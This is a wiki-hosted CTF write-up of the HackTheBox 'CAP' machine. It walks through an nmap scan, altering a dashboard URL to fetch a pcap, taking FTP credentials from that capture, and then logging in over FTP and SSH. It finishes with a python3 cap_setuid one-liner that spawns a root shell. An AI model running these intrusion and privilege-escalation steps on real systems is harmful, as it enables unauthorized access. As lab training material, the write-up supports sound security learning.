imported>Aghanim at 07:52, 29 June 2021

2021-06-29T07:52:19Z

New page

{{Infobox WriteUp
| name = CAP
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = PCAP Analysis, SUID
}}

[[File:2021-06-2134235235.png|thumb]]

This is an interesting CTF where, based on the name of this machine, I'll have to analyze a pcap file and try to get some information out of it. So as always, I start with the enumeration stage.

== Enumeration ==

nmap -sV -A -oN result.nmap 10.10.10.245
---------------------------------------
# Nmap 7.91 scan initiated Tue Jun 22 12:12:53 2021 as: nmap -sV -A -oN result.nmap2 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Tue, 22 Jun 2021 11:25:24 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
|
| 404 Not Found
| Not Found
| The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Tue, 22 Jun 2021 11:25:18 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
|
|
|
|
|
| Security Dashboard
|
|
|
|
|
|
|
|
|
|
| Bad Request
|
|
| Bad Request
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|
|_
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 44.02 ms 10.10.14.1
2 44.06 ms 10.10.10.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 22 12:15:18 2021 -- 1 IP address (1 host up) scanned in 145.09 second

</pre>

From the NMAP scan I see that port 21, 22 and 80 are open. Lets check out the webserver.

[[File:2021-06-image-4.png|thumb]]

I'm already logged in as the user Nathan. On the dashboard there are vizualisation for Security events, failed login attempts and port scans.

[[File:2021-06-image-5.png|thumb]]

On the "Security Snapshot (5 second PCAP + Analysis)" I can see from the URL that it point us to 10.10.10.245/data/8. We can try and change the last number and see if we find any data.

[[File:2021-06-image-6.png|thumb]]

We'll download the pcap file and analyze it with WireShark. We know from our enumeration stage that the server uses FTP on port 21. Search for FTP in WireShark.

[[File:2021-06-image-7.png|thumb]]

From the WireShark we found a username and a password. We'll log into FTP with the username and password.

== Gaining Access ==

ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:aghanim): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 0 1001 0 Jun 28 05:24 2
drwxr-xr-x 3 1001 1001 4096 Jun 28 08:06 snap
-r-------- 1 1001 1001 33 Jun 28 03:08 user.txt
226 Directory send OK.

</pre>

From here we find the first user flag.

We also know from the enumeration stage that port 22 is open. I'll use the username and password to log into SSH.

ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

Last login: Mon Jun 28 09:55:58 2021 from 10.10.14.55

nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

</pre>

== Privilege Escalation ==

Now I'll search to see if the user have sudo rights, SUID and capabilites to see if we can escalate our privileges.

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

</pre>

From [https://gtfobins.github.io/ gtfobins.github.io]: If the binary has the Linux <code>CAP_SETUID</code> capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

So I'll try to use the command

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

</pre>

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# ls -la /root
total 36
drwx------ 6 root root 4096 May 27 09:16 .
drwxr-xr-x 20 root root 4096 Jun 1 10:09 ..
lrwxrwxrwx 1 root root 9 May 15 21:40 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 May 23 19:17 .cache
drwxr-xr-x 3 root root 4096 May 23 19:17 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwx------ 2 root root 4096 May 23 19:17 .ssh
lrwxrwxrwx 1 root root 9 May 27 09:16 .viminfo -> /dev/null
-r-------- 1 root root 33 Jun 28 03:08 root.txt
drwxr-xr-x 3 root root 4096 May 23 19:17 snap
#

</pre>

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/CAP - Revision history

imported>Aghanim at 07:52, 29 June 2021